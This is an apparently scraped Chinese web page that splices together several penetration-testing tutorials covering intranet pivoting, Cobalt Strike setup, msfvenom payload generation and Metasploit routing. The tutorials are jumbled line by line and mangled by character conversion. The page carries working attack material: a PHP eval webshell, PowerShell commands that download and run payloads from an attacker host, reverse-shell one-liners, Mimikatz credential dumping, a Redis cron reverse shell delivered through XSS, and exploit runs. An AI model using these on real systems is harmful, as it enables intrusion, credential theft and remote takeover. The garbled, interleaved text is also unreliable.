快捷搜索:

您的位置:金莎娱乐 > 互联网 > 火速上手,渗透神器体系

火速上手,渗透神器体系

发布时间:2019-11-07 03:03编辑:互联网浏览(57)

    原题目:cobalt strike 火速上手 [ 一 ]

    转自:https://thief.one/2017/08/01/1/?hmsr=toutiao.io&utm_medium=toutiao.io&utm_source=toutiao.io

    拓扑设计

    图片 1

     

    0x01 关于 Cobalt Strike

    前些天玩了风度翩翩把内网渗透,在那之中最首要利用了 metasploit 那款内网渗透神器。metasploit咱们分明不素不相识,作者也在很早早前就有接触过,但老是重复接纳它时都会忘记一些用法,因而为了有支持查询本身在本篇记录下metasploit神器的部分常用命令,以至内网渗透中哪些选用它。
    Mac下安装metasploit
    mac下安装metasploit比较简单,官方网址下载pkg安装包,间接设置就能够;供给静心的是设置到位后的门路。msfconsole路线:
    1

    图片 2

    拓扑介绍

    个中192.168.1.0/24模拟的是公网的境况

    172.21.132.0/24效仿的是合营社内网的条件

    边界web服务器双网卡(公网的:192.168.1.110,和内网的172.21.132.110卡塔尔,并且为了最核泛酸心得安全保持,web边界服务器设置了防火墙,此防火墙对外网只怒放80,81,443端口,对内网开放具有端口,下边还装有杀毒软件。

    内网还摆放若干台web服务器,黄金时代台旁路报告急察方设备(ips卡塔 尔(英语:State of Qatar),他们都得以连接到外网,然则外网采访不到里头的别的web服务器

    内部web服务器(linux卡塔 尔(阿拉伯语:قطر‎(172.21.132.113)前面放置防火墙,不可以被内网的别样web服务器采访到,然而它可以访问到内网的此外服务器,况且可以一而再一连到外网。那套遇到之中的192.168.1.108是红客的kali攻击机,192.168.1.212是骇客的windows攻击机

    科普下nishang和PowerSploit

    1、Nishang是依照PowerShell的渗漏测验专项使用工具。集成了框架、脚本和各类payload。这几个脚本是由Nishang的作者在实际渗透测验进度中有感而发编写的,具有实战价值。饱含了下载和施行、键盘记录、dns、延时命令等剧本

    2、PowerSploit是又意气风发款Post Exploitation 相关工具,Post Exploitation是鬼子渗透测量检验标准里面包车型大巴东西,正是拿到shell之后干的部分业务。PowerSploit 其实正是有的powershell 脚本,满含Inject-Dll(注入dll 到钦命进度)、Inject-Shellcode(注入shellcode到实践进程卡塔 尔(阿拉伯语:قطر‎、 Encrypt- Script(文本或脚本加密卡塔尔国、Get-GPPPassword(通过groups.xml 获取明文密码卡塔 尔(阿拉伯语:قطر‎、 Invoke- ReverseDnsLookup(扫描DNS PT安德拉记录卡塔 尔(阿拉伯语:قطر‎

    大器晚成款特别卓越的后渗透平台 [ 什么人用什么人知道,嘿嘿……说不定用的独步天下原因,或许正是成都百货上千用法还一直不被自个儿打井出来,因为不会用,所以,才会认为不好用 ]

    /opt/metasploit-framework/bin

    一、About

    渗透开端

     

    第黄金时代边界web服务器上fastcgi配置错误,导致服务器被getshell 因为英特网的菜刀大多都有后门,所以自身用开源的CKnife(介绍位置:跨平台版中夏族民共和国菜刀Cknife公布品类地址: Cknife的github) 因为服务器上有杀毒软件探讨所以要把一句话木马做一下调换绕过思路参考:打狗棒法之进级篇:Cknife改进配置法秒过安全狗

     

    本身用的劳务器端木马内容

    <?php    
    
    eval('$ms509 ='.$_POST['Cknife']);
    
    eval($ms509);
    
    ?>
    

     

    替换Config.ini的PHP_MAKE为

     

    base64_decode($_POST['action']);
    

     

    图片 3

    三番五次形式

    图片 4

    得到webshell之后,首先用systeminfo来查看系统消息

     

    图片 5

    率先能够看出这一个是后生可畏台win贰零壹零 r2 六九个人系统,何况尚未打任何系统补丁所以本身能够从上面反弹八个powershell出来实行进一层的渗漏首先把nishang git clone到和睦的web目录上面,然后在shell目录下找到Invoke-PowerShellTcp.ps1,我为了有助于把Invoke-PowerShellTcp.ps1复制到了web的根目录,作者先在温馨的对讲机上用nc监听8888端口,然后施行

    powershell IEX(New-ObjectNet.WebClient).DownloadString(‘http://192.168.108/Invoke-PowerShellTcp.ps1‘);Invoke-PowerShellTcp-Reverse -IPAddress 192.168.1.108 -port 8888

    在nc上获取一个反弹出来的powershell图片 6

    翻看权限开采权限比极低只是:iis apppool所以小编急需升高一下放权力力日常的做法是要上传二个内核溢出的exp,平常都是上传三个exe,然则自己在这间接选举取直接从塞外加载三个exe到受害主机内部存款和储蓄器中,而且让他实践起来,详细的作者会在《有意思的渗透(番外篇卡塔尔国》中详尽的印证,笔者先把下载到自己的web目录上边,再把用到的提权exp(ms1564.exe卡塔尔放到web根目录下边然后在反弹的shell里面运转

    IEX(New-ObjectNet.WebClient).DownloadString('http://192.168.108/Invoke-ReflectivePEInjection.ps1');Invoke-ReflectivePEInjection-PEUrl
     http://192.168.1.108/ms1564.exe -ExeArgs "cmd" -ForceASLR
    

    如此这般再实行whoami看权限的话即可看来是 nt authority。

    图片 7

     

    (Ps:那在那之中有个坑,那一个ms15051的exp是随意从一个互连网下载下来的,未有通过更改,所以当实践的一声令下参数有空格的时候,他就从不任何影响,也未尝任何回显,后来透过本身不住的尝试,推行cmd的时候就足以把shell的权杖提了,很正确,但是假使你施行powershell那个命令的话,那么这几个反弹的shell就能够假死卡塔尔当时在本机采摘一下音信:首先用mimikatz来脱出登录过得密码:

    IEX (New-ObjectNet.WebClient).DownloadString('http://192.168.1.108/Invoke-Mimikatz.ps1');Invoke-Mimikatz
    

    图片 8

    查看arp的列表

    图片 9

     

     

    见状多数电话集中在172.21.132.100-120以此网段作者调用poershell扫一下

     

    端口扫描的剧本从这里下载:https://github.com/samratashok/nishang/blob/master/Scan/Invoke-PortScan.ps1

     

    扫描:

    IEX (New-ObjectNet.WebClient).DownloadString('http://192.168.1.108/Invoke-PortScan.ps1');Invoke-PortScan-StartAddress 172.21.132.0 -EndAddress 172.21.132.254 -ResolveHost -ScanPort
    

    图片 10

    这时笔者用利用powershell反弹三个meterpreter 利用powersploit框架,由于部分竟然的开始和结果,小编把框架中补助msf的一些去掉了,然则透过的本人的物色,在作者提交的历史记录里面找到了最后风姿浪漫版援救msf的有的:地址是:

    https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/12ce71b9f4b0428d9425e001e5988f91eb2b8b87/CodeExecution/Invoke–Shellcode.ps1

    若是git clone新版本的PowerSploit你要用老版本的CodeExecution/Invoke–Shellcode.ps1替换掉新本子的文件使用形式如故先把脚本下载到黑客自个儿的web目录下,我为着便于,小编写了一个调用脚本放在web目录下(1.ps1)

    IEX(New-ObjectNet.WebClient).DownloadString('http://192.168.1.108/CodeExecution/Invoke-Shellcode.ps1')
    Invoke-Shellcode -payloadwindows/meterpreter/reverse_https -lhost 192.168.1.108 -lport 4444 -force
    

    先把msf打开,然后设置payload为windows/meterpreter/reverse_https,並且监听在4444端口:

    msf > useexploit/multi/handler
    msf exploit(handler) > set payloadwindows/meterpreter/reverse_https
    payload => windows/meterpreter/reverse_https
    msf exploit(handler) > set lport 4444
    lport => 4444
    msf exploit(handler) > set lhost 0.0.0.0
    lhost => 0.0.0.0
    msf exploit(handler) > run
    

    然后在powershell反弹的shell中调用

    IEX (New-ObjectNet.WebClient).DownloadString(‘‘)

    成家立业获得meterpreter,不过注意:这么些meterpreter实践shell是无法博取交互作用式的cmd ,因为刚刚用exp把反弹的powershell形成了system的权能,所以再反弹出来的meterpreter也是system权限

    那时候能够 meterpreter查看路由: runget_local_subnets

    meterpreter 找出putty保存的消息 run enum_putty

    meterpreter 寻觅ie保存的密码 run post/windows/gather/enum_ie

    地点音信征集大致了,能够把meterpreter放入后台: background

    下一场加多路由(那样本领开展内网的围观卡塔尔: route add 172.21.132.0 255.255.255.0 1 route add的第一个参数是地点,第叁个参数地址是掩码,第多少个参数是sessis的id

    拓展内网的主计算机扫描描:利用smb实行主机识别: use auxiliary/scanner/smb/smb_version

    图片 11

    选用刚才找到的管理人密码在内网里面碰撞一下,看看多少主机用的是形似的密码 用的是:use auxiliary/scanner/smb/smb_login

    图片 12

     

    能够见到内网里面包车型大巴大部对讲机都是用的二个密码

     

    上面小编要用socks代理步入到内网里面获取一些消息

     

    有两种选拔:首先msf提供了风度翩翩种socks4a的代理,浏览器能够用那个代理步入到内网,不过burp不能够用socks4a的代办第二:能够用reGeorgSocksProxy.py的socks5进来到内网里面第三:可以用特别处理过得xsocks.exe,通过powershell远程加载到内存里面运维之后得到socks5的代办

     

    因为那是60字节webshell的杂技,所以自个儿用第二种办法步向到内网:

     

    首先在骇客的web里面归入特殊管理的xsocks.exe,然后用poweshell加载

    IEX (New-ObjectNet.WebClient).DownloadString('http://192.168.1.108/Invoke-ReflectivePEInjection.ps1');Invoke-ReflectivePEInjection-PEUrl http://192.168.1.108/xsocks.exe -ExeArgs "-l 443" -ForceASLR
    

    然后burp那样设置:

    图片 13

     

    火狐中如此设置

     

    图片 14

    就能够完成那样的功用了

    图片 15

    看一下效果与利益:

    图片 16

    把流量拦截下来repeater也得以

    图片 17

    * 广泛一下redis未授权的知识 详细的篇章能够看redis未授权访谈总括 而redis的csrf漏洞的发生原因是:正是当向redis发送无效指令时,redis本身左券不会停下tcp链接。同有时候redis只会实施body里的灵光指令,而不会关心http header里的原委。

    * 科学普及一下csrf的抨击:CSRAV4F:跨站恳求假造,也被称得上:one click attack/session riding,缩写为:CSEvoqueF/XSEscortF,不问可以见到攻击者盗用了你的身价,以你的名义发送恶意央求。CSOdysseyF能够做的事情包括:以你名义发送邮件,发消息,偷取你的账号,以至于购买商品,加密货币转账……产生的难题回顾:个人隐衷走漏以致资金财产安全。见怪不怪的经文csrf的案例是经过csrf改过你家路由器的dns配置,进而达到违法毛利的目标,能够参见文章TP-link TL-W福特Explorer840N类别路由器存在CS奥德赛F漏洞,可改进放肆配置(含POC测量试验进程卡塔尔

     

    经过内网探测,开采172.21.132.113盛开6379端口,不过透过代办不能连选择后来意识在172.21.132.117:83/xss/add.php发掘二个留言板

    图片 18

     

     

    故而基于那几个稿子:Client-SideRedis Attack Proof of Concept自家做了多个得以应用redis未授权访问拿到反弹shell的js:

          var cmd = new XMLHttpRequest();
         cmd.open("POST", "http://127.0.0.1:6379");
         cmd.send('flushallrn');
         
          var cmd =new XMLHttpRequest();
         cmd.open("POST", "http://127.0.0.1:6379");
         cmd.send('eval ''   'redis.call("set","1","\n\n*/1 * * * * /bin/bash -i >&/dev/tcp/192.168.1.108/5566 0>&1\n\n");redis.call("config", "set", "dir","/var/spool/cron/"); redis.call("config","set", "dbfilename", "root");'   '' 0'  "rn");
    
          var cmd =new XMLHttpRequest();
         cmd.open("POST", "http://127.0.0.1:6379");
          cmd.send('savern');
    

     

    把他置身自个儿的web目录下,然后在留言板写入:

     

    <script src=http://192.168.1.108/redis.js></script>
    

    在本机监听用nc监听5566端口,只要有装redis 的那台机子的总指挥查看留言板的话就能弹出叁个shell给自己的主机

    图片 19

    能够见到那个已经反弹的拍卖的shell是root权限

     

    于今结束,整个内网已经被完全渗透

     

    工具基于java,大多数效果在改过的底子上依旧相对相比较实用的,非常符合团队间一块应战

    该目录下还会有别的多少个常用的工具:

    内网机器如下:

    最后的tips

     

    笔者在上面介绍用:poweshell加载外界的exe进入内部存款和储蓄器施行,进而不在受害主机里面留下别样印迹,並且也足以绕过我国主流杀软的查杀那个主张的得以达成基于这几个小说:PowerPwning:Post-Exploiting ByOverpowering PowerShell还有 Powershelltricks::Code Execution & Process Injection

    假如完成那么些前提条件是:

    1.你要有源码

    2.源码必得是c 编写,c#编纂的个个崩溃

    3.编写翻译的时候提议用vs2009 winxp编写翻译

    4.在win上不可能用gcc去编写翻译

    5.编写翻译接受/MT 大概/MTd

    图片 20

     

    6.若是要传递参数的话把int main(int argc char **argv)改成

    int main()
    {
        LPWSTR*szArglist;
        int nArgs;
        int i;
        szArglist =CommandLineToArgvW(GetCommandLineW(), &nArgs);
        if( NULL ==szArglist )
        {
           wprintf(L"CommandLineToArgvW failedn");
            return0;
        }
       
    }
    ……………………
    

     

    7.代码中不可能有写文件的操作

    上面是汇总渗透软件编写翻译进度

    本身以提权工具ms15-051的代码做尝试(代码的源码),增加传递参数的代码后 里面有多少个字符转变的难题,可以和睦消释一下,本身 生成好了今后看看效果 首先把生成好的ms15-051.exe上传出自个儿的web服务器。

    先下载到本地看看怎么着功用

    图片 21

    然后用编写翻译好的ms15-051.exe用powershell加载一下

    图片 22

    越来越多详细情形请自行参谋官方网站,这里就不啰嗦了,以下全体简单称谓'cs'

    图片 23

    图片 24

    0x02 底子条件简单介绍:

    说明:

    kali 实际决定端 ip:192.168.1.144

    msf的插件路线:
    1

    1)Attacker为攻击者,有一个网卡,网段为172.16.0.0,Attacker系统为kali系统

    ubuntu 16.04 自身公网的vps ip:53.3.3.6

    /opt/metasploit-framework/embedded/framework/modules/exploits

    2)福特ExplorerD为第二个曾经渗透的对象,有两块网卡,对应172.16.0.0和7.7.7.0四个网段

    win二〇〇九Koleos2 目的机器 ip:192.168.1.191

    msfvenom
    效果与利益:生成木马文件,替代开始的一段时期版本的msfpayload和msfencoder。
    Options
    msfvenom命令行选项如下:
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19

    3)JC有两块网卡,对应7.7.7.0和8.8.8.0多个网段,JC有ms08-067和efs bof两个漏洞,可getshell

    centos6.9 已控肉鸡 ip:192.168.1.199

    -p, --payload <payload> 钦点须求接受的payload(攻击荷载)
    -l, --list [module_type] 列出钦定模块的具备可用能源,模块类型饱含: payloads, encoders, nops, all
    -n, --nopsled <length> 为payload预先钦命叁个NOP滑动长度
    -f, --format <format> 钦赐输出格式 (使用 --help-formats 来博取msf援救的出口格式列表)
    -e, --encoder [encoder] 内定要求使用的encoder(编码器卡塔尔
    -a, --arch <architecture> 内定payload的对象架构
    --platform <platform> 钦赐payload的靶子平台
    -s, --space <length> 设定有效攻击荷载的最大尺寸
    -b, --bad-chars <list> 设定逃避字符集,举例: 'x00xff'
    -i, --iterations <count> 钦赐payload的编码次数
    -c, --add-code <path> 钦命三个外加的win32 shellcode文件
    -x, --template <path> 内定叁个自定义的可试行文件作为模板
    -k, --keep 珍爱模板程序的动作,注入的payload作为多少个新的长河运转
    --payload-options 列举payload的正式选项
    -o, --out <path> 保存payload
    -v, --var-name <name> 钦命三个自定义的变量,以鲜明输出格式
    --shellest 最小化生成payload
    -h, --help 查看支持选拔
    --help-formats 查看msf支持的输出格式列表

    4)SK有一块网卡,对应8.8.8.0网段,SK有vsftpd的狐狸尾巴,可getshell

    win7cn 另后生可畏台肉鸡 ip:192.168.1.123

    options usage
    查阅帮衬的payload列表:
    1

    5)最早Attacker只获得酷路泽D的msf的shell,对于目的内网情状胸无点墨,也不领悟存在7.7.7.0和8.8.8.0那五个暗藏的网段

    0x03 先来非常快预览cs最宗旨的有的模块具体用处:

    msfvenom -l payloads

    6)指标是筹算通过奥迪Q7D来渗透内网中7.7.7.0和8.8.8.0七个藏匿的网段

    团协会服务器[teamserver]

    翻开销持的出口文件类型:
    1

    二、Step1

    重大是为了有利于一个渗透团队内部能够立即分享全数成员的有着渗透音信,抓实成员间的沟通同盟,以此抓牢渗透功用

    msfvenom --help-formats

    Attacker在RubiconD上通过webshell运转了三个reverse类型的后门,然后操作如下:

    也正是说,平常状态下三个团队只须要起三个团伙服务器就能够,团队中的具备成员只须求拿着本身的cs用户端登入到集体服务器就会自在完毕同步应战

    翻开销持的编码方式:(为了到达免杀的效应)
    1

    msf > use exploit/multi/handler  msf exploit(handler) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf exploit(handler) > set LHOST 172.16.0.20  LHOST => 172.16.0.20msf exploit(handler) > set LPORT 1234 LPORT => 1234msf exploit(handler) > run [*] Started reverse TCP handler on 172.16.0.20:1234  [*] Starting the payload handler... [*] Sending stage (957487 bytes) to 172.16.0.11 [*] Meterpreter session 2 opened (172.16.0.20:1234 -> 172.16.0.11:49162)meterpreter > ifconfig Interface  1============ Name         : Software Loopback Interface 1Hardware MAC : 00:00:00:00:00:00MTU          : 4294967295IPv4 Address : 127.0.0.1IPv4 Netmask : 255.0.0.0IPv6 Address : ::1IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff Interface 11============ Name         : Intel(R) PRO/1000 MT Desktop Adapter Hardware MAC : 08:00:27:e1:3f:af MTU          : 1500IPv4 Address : 172.16.0.11IPv4 Netmask : 255.255.255.0Interface 19============ Name         : Intel(R) PRO/1000 MT Desktop Adapter #2Hardware MAC : 08:00:27:7f:3c:fe MTU          : 1500IPv4 Address : 7.7.7.11IPv4 Netmask : 255.255.255.0 
    

    本来,实际中大概为了尽量久的保持住指标机器权限,还有大概会习于旧贯性的多开多少个组织服务器,防止现身意外情形

    msfvenom -l encoders

    三、Step2

    除此以外,团体服务器最棒运维在linux平台上[这次演示所用的集体服务器系统为ubuntu 16.04]

    查看支持的空字段模块:(为了达到免杀的效应)
    1

    发觉本田CR-VD有两块网卡后,想办法渗透另一个网段7.7.7.0,首先要增添路由[不增多路由也足以直接用meterpreter shell中的模块访问到7.7.7.x网段,加多路由的目标是为着使得msf模块能够访问到7.7.7.x网段],meterpreter shell能够访谈到7.7.7.x网段,msf 中的模块无法访谈到7.7.7.x网段,msf中的模块所处的ip是攻击者的ip,meterpreter shell所处的ip是奥德赛D的ip.在meterpreter中 增添路由的目标是为了给msf模块作代理,也即给Attacker作代理,不过只好给Attacker的msf模块作代理,要想给Attacker的任何 应用程序作代理,则须要在meterpreter增多路由后再运转msf的拉开sock4的模块,然后再用proxychains来设置Attacker的别的应用程序的代办为msf的打开sock4代理模块中安装的代理进口。

    # ./teamserver 团队服务器ip 设置贰个集体服务器密码[外人要用那个密码技艺连进来] 配置文件[相符暗中同意就可以] [YYYY-MM-DD]

    msfvenom -l nops

    操作如下:

    # ./teamserver 53.3.3.6 klion

    基础payload
    指令格式
    1

    meterpreter > run autoroute -s 7.7.7.0/24[*] Adding a route to 7.7.7.0/255.255.255.0... [ ] Added route to 7.7.7.0/255.255.255.0 via 172.16.0.11[*] Use the -p option to list all active routes meterpreter > run autoroute -p Active Routing Table ====================  Subnet Netmask Gateway  ------ ------- ------- 7.7.7.0 255.255.255.0 Session 2meterpreter > 
    

    图片 25

    msfvenom -p <payload> <payload options> -f <format> -o <path>

    下一场开端扫描7.7.7.0网段,操作如下:

    客户端[cobaltstrike]

    Linux
    1
    2
    3
    4

    meterpreter > run post/windows/gather/arp_scanner RHOSTS=7.7.7.0/24[*] Running module against DISCORDIA [*] ARP Scanning 7.7.7.0/24[*]     IP: 7.7.7.11 MAC 08:00:27:7f:3c:fe (CADMUS COMPUTER SYSTEMS) [*]     IP  7.7.7.12 MAC 08:00:27:3a:b2:c1 (CADMUS CIMPUTER SYSTEMS) [*]     IP: 7.7.7.20 MAC 08:00:27:fa:a0:c5 (CADMUS COMPUTER SYSTEMS) [*]     IP: 7.7.7.255 MAC 08:00:27:3f:2a:b5 (CADMUS COMPUTER SYSTEMS) meterpreter > 
    

    为了更加好的求证效果与利益,此处就各自模拟五个例外的顾客端同一时候登入到同大器晚成台团队服务器中,首先,先在本机械运输转顾客端尝试登入到共青团和少先队器,客商端运维之后会提示您输入团队服务器的ip,端口和密码,客户名可随机

    反向连接:
    msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf
    正向连接:
    msfvenom -p linux/x86/meterpreter/bind_tcp LHOST=<Target IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf

    arp_scanner不太够用,无法扫到端口消息[那个时候也可用msf自带的其余能够扫描端口的模块如auxiliary/scanner/portscan/tcp来扫 描,因为前面增添了路由,使得msf中的模块能够用meterpreter作为代理访问到7.7.7.x网段],于是用Attacker本机的nmap来扫[可以更完全的扫视,nmap应该比msf中的扫描模块强盛],首先在奥迪Q3D上开sockets4代理,然后用proxychains设置nmap的代办为msf模块开 启的Attacker的1080端口提供的代理,操作如下:

    # ./cobaltstrike

    Windows
    1

    meterpreter > background  [*] Backgrounding session 2... msf > use auxiliary/server/socks4a  msf auxiliary(socks4a) > show options  Module options (auxiliary/server/socks4a):    Name     Current Setting  Required  Description    ----     ---------------  --------  -----------    SRVHOST  0.0.0.0          yes       The address to listen on    SRVPORT  1080             yes       The port to listen on. Auxiliary action:    Name   Description    ----   -----------    Proxy   msf auxiliary(socks4a) > set srvhost 172.16.0.20 srvhost => 172.16.0.20msf auxiliary(socks4a) > run [*] Auxiliary module execution completed [*] Starting the socks4a proxy server msf auxiliary(socks4a) > netstat -antp | grep 1080 [*] exec: netstat -antp | grep 1080 tcp        0      172.16.0.20:1080            0.0.0.0:*               LISTEN      3626/ruby        msf auxiliary(socks4a) > 
    

    图片 26

    msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe

    proxychains设置/etc/proxychains.conf如下:

    接着,再到另意气风发台kali机器上开垦顾客端登录登入到同一团队服务器,最后贯彻的功用如下,共青团和少先队成员能够由此event相互联系,也可通过event清晰看出共青团和少先队中的其余成员在哪些日子都干了些什么,非常详细直观:

    Mac
    1
    2

    [ProxyList]# add proxy here ...# meanwile# defaults set to "tor"#socks4  127.0.0.1 9050socks4  172.16.0.20 1080 
    

    # ./cobaltstrike

    msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f macho > shell.macho
    Web Payloads

    nmap扫描如下:

    图片 27

    PHP
    1
    2

    root@kali:~# proxychains nmap -sT -sV -Pn -n -p22,80,135,139,445 --script=smb-vuln-ms08-067.nse 7.7.7.20ProxyChains-3.1 (http://proxychains.sf.net)Starting Nmap 7.25BETA1 ( https://nmap.org )|S-chain|-<>-172.16.0.20:1080-<><>-7.7.7.20:445-<><>-OK |S-chain|-<>-172.16.0.20:1080-<><>-7.7.7.20:80-<><>-OK |S-chain|-<>-172.16.0.20:1080-<><>-7.7.7.20:135-<><>-OK |S-chain|-<>-172.16.0.20:1080-<><>-7.7.7.20:22-<><>-OK |S-chain|-<>-172.16.0.20:1080-<><>-7.7.7.20:139-<><>-OK |S-chain|-<>-172.16.0.20:1080-<><>-7.7.7.20:22-<><>-OK |S-chain|-<>-172.16.0.20:1080-<><>-7.7.7.20:135-<><>-OK |S-chain|-<>-172.16.0.20:1080-<><>-7.7.7.20:139-<><>-OK |S-chain|-<>-172.16.0.20:1080-<><>-7.7.7.20:445-<><>-OK |S-chain|-<>-172.16.0.20:1080-<><>-7.7.7.20:139-<><>-OK |S-chain|-<>-172.16.0.20:1080-<><>-7.7.7.20:135-<><>-OK |S-chain|-<>-172.16.0.20:1080-<><>-7.7.7.20:445-<><>-OK Nmap scan report for 7.7.7.20Host is up (0.17s latency). PORT     STATE    SERVICE      VERSION 22/tcp   open     ssh          Bitvise WinSSHD 7.16 (FlowSsh 7.15; protocol 2.0)80/tcp   closed   http         Easy File Sharing Web Server httpd 6.9 135/tcp  open     msrpc        Microsoft Windows RPC 139/tcp  open     netbios-ssn  Microsoft Windows netbios-ssn 445/tcp  open     microsoft-ds Microsoft Windows 2003 or 2008 microsoft-ds Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_server_2003 Host script results: | smb-vuln-ms08-067:  |   VULNERABLE: |   Microsoft Windows system vulnerable to remote code execution (MS08-067)|     State: VULNERABLE |     IDs: CVE:CVE-2008-4250 |          The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2,  |          Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary  |          code via a crafted RPC request that triggers the overflow during path canonicalization. |  |     Disclosure date: 2008-10-23 |     References: |       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250|_      https://technet.microsoft.com/en-us/library/security/ms08-067.aspxService detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 12.51 seconds root@kali:~# 
    

    图片 28

    msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php
    cat shell.php | pbcopy && echo '<?php ' | tr -d 'n' > shell.php && pbpaste >> shell.php

    近年来开采了7.7.7.20(JC)那台机械端口开放超级多,尝试寻找JC的漏洞,操作如下: 首先会见JC的80端口运行了什么cms,可是Attacker的浏览器直接访问 不在同一网段,此处有个要潜心的内容:

    使用cs的各类监听器

    ASP
    1

    Attention:能够筛选使用proxychains设置Attacker的浏览器的代理为Attacker的1080端口的socks4代理进口,也可透过在哈弗D的meterpreter会 话中运作portfwd模块命令,portfwd命令如下:

    实在,监听器的成效很简短,主若是为了承担payload回传的各个数据,

    msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp > shell.asp

    meterpreter > portfwd add -L 172.16.0.20 -l 2323 -p 80 -r 7.7.7.20[*] Local TCP relay created: 172.16.0.20:2323 <-> 7.7.7.20:80meterpreter > meterpreter > portfwd listActive Port Forwards ====================    Index  Local             Remote       Direction    -----  -----             ------       ---------   1      172.16.0.20:2323  7.7.7.20:80  Forward1 total active port forwards. meterpreter > 
    

    譬喻说,我们的payload在对象机器试行现在,会回连到监听器然后下载施行真正的shellcode代码,其实跟msf中handler的作用为主是同生机勃勃的

    JSP
    1

    经过拜见Attacker的2323端口访谈JC的80端口,结果如下:

    在cs中的监听器有三种,风流倜傥种是beacon,另风流倜傥种是foreign

    msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.jsp

    图片 29

    foreign 首若是提要求外界使用的风姿罗曼蒂克对监听器,比方您想接受cs派生二个meterpreter的shell回来,来世襲前面包车型地铁内网渗透,那时就分选接受外界监听器

    WAR
    1
    2

    这里的portfwd模块不只是名字上的端口转载的情致,近些日子小编以为portfwd也就是半个ssh正向代理加三个ssh反向代理组成的综合命令,ssh正向反向代理可参看这里的知道 。ssh正向反向代理通晓小编感觉portfwd命令之后Attacker能够经过拜见Attacker本人ip的2323端口进而访谈到JC的80端口时期发生了3件事。

    再来简单演示下,怎么着高效创制一个监听器,具体进度如下

    msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f war > shell.wa
    Scripting Payloads

    1.TiguanD拜候JC的80端口,这里也正是半个ssh正向代理

    点击左上角的Cobalt Strike菜单

    Python
    1

    2.揽胜D绑定已经访谈到的JC的80端口的数码到Attacker的2323端口,这里一定于四个ssh反向代理,也正是卡宴D有Attacker的ssh权限

    -> 选中Listeners

    msfvenom -p cmd/unix/reverse_python LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.py

    3.攻击者的浏览器访谈攻击者自个儿的172.16.0.20:2323

    -> 接着点击Add按键会自动跳出监听器的配置框

    Bash
    1

    portfwd的用法如下:

    -> 设置好端口ip [ 实际中最棒用域名(走dns隧道) ]和payload类型就能够创立,之后,团队服务器会平素监听该端口等待beacon shell回连的数目

    msfvenom -p cmd/unix/reverse_bash LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.sh

    meterpreter > portfwd -h Usage: portfwd [-h] [add | delete | list | flush] [args] OPTIONS:      -L >opt>  The local host to listen on (optional).      -h        Help banner.      -l >opt>  The local port to listen on.      -p >opt>  The remote port to connect on.      -r >opt>  The remote host to connect on. meterpreter > 
    

    图片 30

    Perl
    1

    其间-L只好设置为攻击者的ip,无法安装为肉鸡的ip,-L设置的ip能够是攻击者的内网ip,-r也足以是目的的内网ip,三个内网之 间通过meterpreter会话的"隧道"来衔接,如若-L后装置的ip是攻击者的内网ip,-r后安装的是指标机器的内网ip,portfwd通过 meterpreter会话连通两台,-l是指攻击者的监听端口,运营完上面的portfwd add -L 172.16.0.20 -l 2323 -p 80 -r 7.7.7.20 命令后,Attacker的2323端口将变为监听状态(也即Attacker会开启2323端口) 这里还要注意route add命令只可以是在meterpreter会话中有效,不可能系统全局有效,笔者感觉route add也是透过meterpreter会 话的"隧道"来兑现攻击者能够访谈目的机器别的网段机器的,也即在下面的Attacker通过portfwd来贯彻访谈目的机器别的网段 机器而不能够因为在portfwd模块运维前由于已经运转了route add模块而由Attacker的浏览器直接访谈目的7.7.7.20:80,因为 route add只会给msf的模块提供meterpreter会话通道作为代理服务,唯有meterpreter会话下可用的模块能够直接待上访谈7.7.7.x 网段,Attacker的浏览器想一向访问7.7.7.20亟需采取proxychins和msf开启的sock4代理.

    图片 31

    msfvenom -p cmd/unix/reverse_perl LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.pl

    地点访谈拿到指标机器JC的80端口新闻看来JC运转的是Eash File Sharing Web Server,可用msf中的模块尝试getshell,操作如 下(若无在meterpreter中增多路由msf是会见不到7.7.7.20的):

    图片 32

    Linux Based Shellcode
    1

    msf  > use exploit/windows/http/easyfilesharing_seh  msf exploit(easyfilesharing_seh) > show options  Module options (exploit/windows/http/easyfilesharing_seh):    Name   Current Setting  Required  Description    ----   ---------------  --------  -----------    RHOST                   yes       The target address    RPORT  80               yes       The target port Exploit target:    Id  Name    --  ----    0   Easy File Sharing 7.2 HTTP msf exploit(easyfilesharing_seh) > set rhost 7.7.7.20 rhost => 7.7.7.20msf exploit(easyfilesharing_seh) > set payload windows/meterpreter/bind_tcp payload => windows/meterpreter/bind_tcp msf exploit(easyfilesharing_seh) > run [*] Started bind handler [*] 7.7.7.20:80 - 7.7.7.20:80 - Sending exploit... [ ] 7.7.7.20:80 - Exploit Sent [*] Sending stage (957999 bytes) to 7.7.7.20 [*] Meterpreter session 2 opened (172.16.0.20-172.16.0.11:0 -> 7.7.7.20:4444) at 2016-12-26 14:21:11  0300 
    

    说罢监听器,最后,我们再来讲payload [攻击载荷]

    msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>

